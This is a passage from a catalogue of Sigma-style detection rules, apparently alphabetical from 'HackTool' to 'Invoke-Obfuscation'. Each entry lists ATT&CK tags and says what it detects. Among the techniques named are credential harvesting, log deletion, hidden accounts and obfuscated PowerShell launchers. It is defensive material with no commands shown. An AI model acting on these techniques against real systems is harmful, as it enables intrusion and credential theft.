    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.002  ·
    Share on: twitter facebook linkedin copy

    Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon


    Read More
  • HackTool - TruffleSnout Execution

    calendar Aug 12, 2024 · attack.discovery attack.t1482  ·
    Share on: twitter facebook linkedin copy

    Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.


    Read More
  • HackTool - Typical HiveNightmare SAM File Export

    calendar Aug 12, 2024 · attack.credential-access attack.t1552.001 cve.2021-36934  ·
    Share on: twitter facebook linkedin copy

    Detects files written by the different tools that exploit HiveNightmare


    Read More
  • HackTool - WinRM Access Via Evil-WinRM

    calendar Aug 12, 2024 · attack.lateral-movement attack.t1021.006  ·
    Share on: twitter facebook linkedin copy

    Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.


    Read More
  • HackTool - Wmiexec Default Powershell Command

    calendar Aug 12, 2024 · attack.defense-evasion attack.lateral-movement  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script


    Read More
  • Hacktool Execution - PE Metadata

    calendar Aug 12, 2024 · attack.credential-access attack.t1588.002 attack.t1003  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed


    Read More
  • Hacktool Ruler

    calendar Aug 12, 2024 · attack.discovery attack.execution attack.t1087 attack.t1114 attack.t1059 attack.t1550.002  ·
    Share on: twitter facebook linkedin copy

    This events that are generated when using the hacktool Ruler by Sensepost


    Read More
  • HackTool Service Registration or Execution

    calendar Aug 12, 2024 · attack.execution attack.t1569.002 attack.s0029  ·
    Share on: twitter facebook linkedin copy

    Detects installation or execution of services


    Read More
  • HAFNIUM Exchange Exploitation Activity

    calendar Aug 12, 2024 · attack.persistence attack.t1546 attack.t1053 attack.g0125 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers


    Read More
  • Hardware Model Reconnaissance Via Wmic.EXE

    calendar Aug 12, 2024 · attack.execution attack.t1047 car.2016-03-002  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information


    Read More
  • Harvesting Of Wifi Credentials Via Netsh.EXE

    calendar Aug 12, 2024 · attack.discovery attack.credential-access attack.t1040  ·
    Share on: twitter facebook linkedin copy

    Detect the harvesting of wifi credentials using netsh.exe


    Read More
  • Hermetic Wiper TG Process Patterns

    calendar Aug 12, 2024 · attack.execution attack.lateral-movement attack.t1021.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022


    Read More
  • HH.EXE Execution

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "hh.exe" to open ".chm" files.


    Read More
  • Hidden Executable In NTFS Alternate Data Stream

    calendar Aug 12, 2024 · attack.defense-evasion attack.s0139 attack.t1564.004  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash


    Read More
  • Hidden Files and Directories

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1564.001  ·
    Share on: twitter facebook linkedin copy

    Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character


    Read More
  • Hidden Local User Creation

    calendar Aug 12, 2024 · attack.persistence attack.t1136.001  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a local hidden user account which should not happen for event ID 4720.


    Read More
  • Hidden Powershell in Link File Pattern

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects events that appear when a user click on a link file with a powershell command in it


    Read More
  • Hidden User Creation

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1564.002  ·
    Share on: twitter facebook linkedin copy

    Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option


    Read More
  • Hide Schedule Task Via Index Value Tamper

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562  ·
    Share on: twitter facebook linkedin copy

    Detects when the "index" value of a scheduled task is modified from the registry Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)


    Read More
  • Hiding Files with Attrib.exe

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1564.001  ·
    Share on: twitter facebook linkedin copy

    Detects usage of attrib.exe to hide files from users.


    Read More
  • Hijack Legit RDP Session to Move Laterally

    calendar Aug 12, 2024 · attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder


    Read More
  • History File Deletion

    calendar Aug 12, 2024 · attack.impact attack.t1565.001  ·
    Share on: twitter facebook linkedin copy

    Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity


    Read More
  • Host Without Firewall

    calendar Aug 12, 2024  ·
    Share on: twitter facebook linkedin copy

    Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.


    Read More
  • HTML Help HH.EXE Suspicious Child Process

    calendar Aug 12, 2024 · attack.defense-evasion attack.execution attack.initial-access attack.t1047 attack.t1059.001 attack.t1059.003 attack.t1059.005 attack.t1059.007 attack.t1218 attack.t1218.001 attack.t1218.010 attack.t1218.011 attack.t1566 attack.t1566.001  ·
    Share on: twitter facebook linkedin copy

    Detects a suspicious child process of a Microsoft HTML Help (HH.exe)


    Read More
  • HTTP Request With Empty User Agent

    calendar Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects a potentially suspicious empty user agent strings in proxy log. Could potentially indicate an uncommon request method.


    Read More
  • Huawei BGP Authentication Failures

    calendar Aug 12, 2024 · attack.initial-access attack.persistence attack.privilege-escalation attack.defense-evasion attack.credential-access attack.collection attack.t1078 attack.t1110 attack.t1557  ·
    Share on: twitter facebook linkedin copy

    Detects BGP failures which may be indicative of brute force attacks to manipulate routing.


    Read More
  • HybridConnectionManager Service Installation

    calendar Aug 12, 2024 · attack.persistence attack.t1554  ·
    Share on: twitter facebook linkedin copy

    Rule to detect the Hybrid Connection Manager service installation.


    Read More
  • HybridConnectionManager Service Installation - Registry

    calendar Aug 12, 2024 · attack.resource-development attack.t1608  ·
    Share on: twitter facebook linkedin copy

    Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.


    Read More
  • HybridConnectionManager Service Running

    calendar Aug 12, 2024 · attack.persistence attack.t1554  ·
    Share on: twitter facebook linkedin copy

    Rule to detect the Hybrid Connection Manager service running on an endpoint.


    Read More
  • Hypervisor Enforced Code Integrity Disabled

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel


    Read More
  • Hypervisor Enforced Paging Translation Disabled

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.


    Read More
  • IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218.011 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID


    Read More
  • IE Change Domain Zone

    calendar Aug 12, 2024 · attack.persistence attack.t1137  ·
    Share on: twitter facebook linkedin copy

    Hides the file extension through modification of the registry


    Read More
  • IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.


    Read More
  • IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI

    calendar Aug 12, 2024 · attack.execution attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.


    Read More
  • Ie4uinit Lolbin Use From Invalid Path

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories


    Read More
  • IIS Native-Code Module Command Line Installation

    calendar Aug 12, 2024 · attack.persistence attack.t1505.003  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious IIS native-code module installations via command line


    Read More
  • IIS WebServer Access Logs Deleted

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070  ·
    Share on: twitter facebook linkedin copy

    Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence


    Read More
  • ImagingDevices Unusual Parent/Child Processes

    calendar Aug 12, 2024 · attack.defense-evasion attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity


    Read More
  • Impacket PsExec Execution

    calendar Aug 12, 2024 · attack.lateral-movement attack.t1021.002  ·
    Share on: twitter facebook linkedin copy

    Detects execution of Impacket's psexec.py.


    Read More
  • Import LDAP Data Interchange Format File Via Ldifde.EXE

    calendar Aug 12, 2024 · attack.command-and-control attack.defense-evasion attack.t1218 attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.


    Read More
  • Import PowerShell Modules From Suspicious Directories

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects powershell scripts that import modules from suspicious directories


    Read More
  • Import PowerShell Modules From Suspicious Directories - ProcCreation

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects powershell scripts that import modules from suspicious directories


    Read More
  • Important Scheduled Task Deleted

    calendar Aug 12, 2024 · attack.impact attack.t1489  ·
    Share on: twitter facebook linkedin copy

    Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities


    Read More
  • Important Scheduled Task Deleted/Disabled

    calendar Aug 12, 2024 · attack.execution attack.privilege-escalation attack.persistence attack.t1053.005  ·
    Share on: twitter facebook linkedin copy

    Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities


    Read More
  • Important Windows Event Auditing Disabled

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.002  ·
    Share on: twitter facebook linkedin copy

    Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled.


    Read More
  • Important Windows Service Terminated Unexpectedly

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects important or interesting Windows services that got terminated unexpectedly.


    Read More
  • Important Windows Service Terminated With Error

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects important or interesting Windows services that got terminated for whatever reason


    Read More
  • Imports Registry Key From a File

    calendar Aug 12, 2024 · attack.t1112 attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the import of the specified file to the registry with regedit.exe.


    Read More
  • Imports Registry Key From an ADS

    calendar Aug 12, 2024 · attack.t1112 attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the import of a alternate datastream to the registry with regedit.exe.


    Read More
  • Impossible Travel

    calendar Aug 12, 2024 · attack.t1078 attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access  ·
    Share on: twitter facebook linkedin copy

    Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.


    Read More
  • Increased Failed Authentications Of Any Type

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1078  ·
    Share on: twitter facebook linkedin copy

    Detects when sign-ins increased by 10% or greater.


    Read More
  • Indicator Removal on Host - Clear Mac System Logs

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070.002  ·
    Share on: twitter facebook linkedin copy

    Detects deletion of local audit logs


    Read More
  • Indirect Command Execution By Program Compatibility Wizard

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detect indirect command execution via Program Compatibility Assistant pcwrun.exe


    Read More
  • Indirect Command Execution From Script File Via Bash.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1202  ·
    Share on: twitter facebook linkedin copy

    Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.


    Read More
  • Indirect Inline Command Execution Via Bash.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1202  ·
    Share on: twitter facebook linkedin copy

    Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.


    Read More
  • InfDefaultInstall.exe .inf Execution

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.


    Read More
  • Ingress/Egress Security Group Modification

    calendar Aug 12, 2024 · attack.initial-access attack.t1190  ·
    Share on: twitter facebook linkedin copy

    Detects when an account makes changes to the ingress or egress rules of a security group. This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.


    Read More
  • Insecure Proxy/DOH Transfer Via Curl.EXE

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH.


    Read More
  • Insecure Transfer Via Curl.EXE

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "curl.exe" with the "--insecure" flag.


    Read More
  • Install New Package Via Winget Local Manifest

    calendar Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later.


    Read More
  • Install Root Certificate

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1553.004  ·
    Share on: twitter facebook linkedin copy

    Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s


    Read More
  • Installation of TeamViewer Desktop

    calendar Aug 12, 2024 · attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    TeamViewer_Desktop.exe is create during install


    Read More
  • Interactive AT Job

    calendar Aug 12, 2024 · attack.privilege-escalation attack.t1053.002  ·
    Share on: twitter facebook linkedin copy

    Detects an interactive AT job, which may be used as a form of privilege escalation.


    Read More
  • Interactive Bash Suspicious Children

    calendar Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1059.004 attack.t1036  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious interactive bash as a parent to rather uncommon child processes


    Read More
  • Internet Explorer Autorun Keys Modification

    calendar Aug 12, 2024 · attack.persistence attack.t1547.001  ·
    Share on: twitter facebook linkedin copy

    Detects modification of autostart extensibility point (ASEP) in registry.


    Read More
  • Internet Explorer DisableFirstRunCustomize Enabled

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.


    Read More
  • Invalid PIM License

    calendar Aug 12, 2024 · attack.t1078 attack.persistence attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Identifies when an organization doesn't have the proper license for PIM and is out of compliance.


    Read More
  • Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.003  ·
    Share on: twitter facebook linkedin copy

    Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)


    Read More
  • Invoke-Obfuscation CLIP+ Launcher

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated use of Clip.exe to execute PowerShell


    Read More
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated use of Clip.exe to execute PowerShell


    Read More
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell Module

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated use of Clip.exe to execute PowerShell


    Read More
  • Invoke-Obfuscation CLIP+ Launcher - Security

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated use of Clip.exe to execute PowerShell


    Read More
  • Invoke-Obfuscation CLIP+ Launcher - System

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated use of Clip.exe to execute PowerShell


    Read More
  • Invoke-Obfuscation COMPRESS OBFUSCATION

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via COMPRESS OBFUSCATION


    Read More
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via COMPRESS OBFUSCATION


    Read More
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via COMPRESS OBFUSCATION


    Read More
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Security

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via COMPRESS OBFUSCATION


    Read More
  • Invoke-Obfuscation COMPRESS OBFUSCATION - System

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via COMPRESS OBFUSCATION


    Read More
  • Invoke-Obfuscation Obfuscated IEX Invocation

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block


    Read More
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014


    Read More
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below


    Read More
  • Invoke-Obfuscation Obfuscated IEX Invocation - Security

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027  ·
    Share on: twitter facebook linkedin copy

    Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references


    Read More
  • Invoke-Obfuscation Obfuscated IEX Invocation - System

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027  ·
    Share on: twitter facebook linkedin copy

    Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references


    Read More
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via RUNDLL LAUNCHER


    Read More
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via RUNDLL LAUNCHER


    Read More
  • Invoke-Obfuscation RUNDLL LAUNCHER - Security

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via RUNDLL LAUNCHER


    Read More
  • Invoke-Obfuscation RUNDLL LAUNCHER - System

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via RUNDLL LAUNCHER


    Read More
  • Invoke-Obfuscation STDIN+ Launcher

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated use of stdin to execute PowerShell


    Read More
  • Invoke-Obfuscation STDIN+ Launcher - Powershell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated use of stdin to execute PowerShell


    Read More
  • Invoke-Obfuscation STDIN+ Launcher - PowerShell Module

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated use of stdin to execute PowerShell


    Read More
  • Invoke-Obfuscation STDIN+ Launcher - Security

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated use of stdin to execute PowerShell


    Read More
  • Invoke-Obfuscation STDIN+ Launcher - System

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated use of stdin to execute PowerShell


    Read More
  • Invoke-Obfuscation VAR+ Launcher

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated use of Environment Variables to execute PowerShell


    Read More
  • Invoke-Obfuscation VAR+ Launcher - PowerShell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated use of Environment Variables to execute PowerShell


    Read More
  • Invoke-Obfuscation VAR+ Launcher - PowerShell Module

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated use of Environment Variables to execute PowerShell


    Read More
  • Invoke-Obfuscation VAR+ Launcher - Security

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated use of Environment Variables to execute PowerShell


    Read More
  • Invoke-Obfuscation VAR+ Launcher - System

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated use of Environment Variables to execute PowerShell


    Read More
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via VAR++ LAUNCHER


    Read More
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via VAR++ LAUNCHER


    Read More
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via VAR++ LAUNCHER


    Read More
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via VAR++ LAUNCHER


    Read More
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via VAR++ LAUNCHER


    Read More
  • Invoke-Obfuscation Via Stdin

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via Stdin in Scripts


    Read More
  • Invoke-Obfuscation Via Stdin - Powershell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via Stdin in Scripts


    Read More
  • Invoke-Obfuscation Via Stdin - PowerShell Module

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via Stdin in Scripts


    Read More
  • Invoke-Obfuscation Via Stdin - Security

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via Stdin in Scripts


    Read More
  • Invoke-Obfuscation Via Stdin - System

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via Stdin in Scripts


    Read More
  • Invoke-Obfuscation Via Use Clip

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via use Clip.exe in Scripts


    Read More
  • Invoke-Obfuscation Via Use Clip - Powershell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via use Clip.exe in Scripts


    Read More
  • Invoke-Obfuscation Via Use Clip - PowerShell Module

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via use Clip.exe in Scripts


    Read More
  • Invoke-Obfuscation Via Use Clip - Security

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via use Clip.exe in Scripts


    Read More
  • Invoke-Obfuscation Via Use Clip - System

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via use Clip.exe in Scripts


    Read More
  • Invoke-Obfuscation Via Use MSHTA

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via use MSHTA in Scripts


    Read More
  • Invoke-Obfuscation Via Use MSHTA - PowerShell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via use MSHTA in Scripts


    Read More
  • Invoke-Obfuscation Via Use MSHTA - PowerShell Module

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via use MSHTA in Scripts


    Read More
  • Invoke-Obfuscation Via Use MSHTA - Security

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via use MSHTA in Scripts


    Read More
  • Invoke-Obfuscation Via Use MSHTA - System

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via use MSHTA in Scripts


    Read More
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via use Rundll32 in Scripts


    Read More
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell Module

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via use Rundll32 in Scripts


    Read More
  • Invoke-Obfuscation Via Use Rundll32 - Security

